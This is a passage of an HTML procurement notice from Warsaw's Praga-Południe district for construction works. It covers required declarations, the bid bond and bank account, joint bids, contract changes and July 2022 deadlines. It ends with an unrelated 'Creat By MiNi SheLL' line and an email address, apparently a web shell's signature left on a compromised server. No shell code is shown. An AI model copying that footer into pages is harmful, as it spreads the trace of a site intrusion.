odpowiedzialnych za<br/>kierowanie robotami budowlanymi.<br/>Wykaz winien zawierać informacje na temat kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania<br/>zamówienia wskazanych osób, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do<br/>dysponowania tymi osobami - wg wzoru stanowiącego załącznik nr 8 do SWZ.<br/><br/>Dokument należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania<br/>Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony Formularz oferty - wg wzoru stanowiącego załącznik nr 1 do SWZ.<br/>Należy dołączyć go na platformie https://zamowienia.um.warszawa.pl jako osobny plik, w formie elektronicznej (tj. w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania Wykonawcy.<br/>2.	Oświadczenie Wykonawcy potwierdzające brak podstaw do wykluczenia z postępowania na podstawie przesłanek określonych w art. 108 ust. 1 ustawy Pzp i art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r., poz. 835) (wzór druku - załącznik nr 2 do SWZ).<br/>W przypadku podmiotów występujących wspólnie oświadczenie składa każdy Wykonawca. W przypadku polegania na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca wraz z oświadczeniem, o którym mowa<br/>powyżej, składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu.<br/>3. Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postepowaniu, określonych w Rozdz.15 pkt 3<br/>SWZ (wzór druku - załącznik nr 3 do SWZ).<br/>W przypadku podmiotów występujących wspólnie oświadczenie składa każdy z Wykonawców, w zakresie w jakim wykazuje<br/>spełnienie warunków udziału w postępowaniu. W przypadku polegania na zdolnościach podmiotów udostępniających<br/>zasoby, Wykonawca składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków<br/>udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby.<br/>4. W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa wraz z<br/>ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (wzór druku - załącznik nr 4 do SWZ).<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej, musi potwierdzać, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/> • zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>• sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>• czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane, których wskazane zdolności dotyczą.<br/>5. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile dotyczy) składane na podstawie<br/>art. 117 ust. 4 ustawy Pzp - (wzór druku - załącznik nr 5 do SWZ).<br/>6. Pełnomocnictwo (o ile dotyczy tj. w przypadku, gdy oferta jest składana przez podmioty występujące wspólnie lub gdy<br/>oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy).<br/>7. Potwierdzenie wpłaty wadium, o którym mowa Rozdz. 23 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w wysokości: 10 000,00 zł.<br/>2. Forma wadium<br/>Wadium może być wniesione w:<br/>a) pieniądzu;<br/>b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy<br/>jest zawsze poręczeniem pieniężnym;<br/>c) gwarancjach bankowych;<br/>d) gwarancjach ubezpieczeniowych;<br/>e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 t.j.)<br/>3. Termin i miejsce wniesienia wadium<br/>1) Wadium należy wnieść najpóźniej do dnia 20.07.2022 r. do godz. 10:00<br/>2) W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Zamawiającego BANK<br/>CITI HANDLOWY W WARSZAWIE Nr 51 1030 1508 0000 0005 5000 7096. Dowód wpłaty należy dołączyć do oferty.<br/>Uwaga!!! O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data<br/>wpływu środków na rachunek Zamawiającego.<br/>3) W przypadku wnoszenia wadium w formie innej niż pieniądzu, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej, wraz z ofertą za pośrednictwem Systemu do upływu składania ofert.<br/>Beneficjentem wskazanym w gwarancji/poręczeniu musi być Miasto Stołeczne Warszawa Dzielnica Praga-Południe, ul.<br/>Grochowska 274, 03-841 Warszawa.<br/>Złożone poręczenie lub gwarancja powinny zawierać w swojej treści zobowiązanie zgodne z art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp.<br/>2. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego. Pełnomocnictwo należy załączyć do oferty.<br/>3. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy<br/>wpisać w formularz oferty.<br/>4. Dokumenty składające się na ofertę powinny być podpisane przez Pełnomocnika lub wszystkich Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych w §15<br/>wzoru umowy stanowiącego załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Uwaga dotycząca sposobu oceny ofert:<br/>W pkt 4.3.5.) Kryterium 1 - Cena oznacza Cenę brutto dla zadania podstawowego (zakres A).<br/><br/>II. Termin realizacji :<br/>1. Wprowadzenie na budowę nastąpi w terminie do 7 dni roboczych od daty podpisania umowy.<br/>2. Umowa obowiązuje od dnia podpisania umowy.<br/>3. Termin wykonania przedmiotu umowy w ramach zamówienia podstawowego (gwarantowanego) ustala się do 12 tygodni<br/>od dnia zawarcia umowy.<br/>4. Termin wykonania przedmiotu umowy w ramach zamówienia opcjonalnego ustala się do 16 tygodni od dnia zawarcia<br/>umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com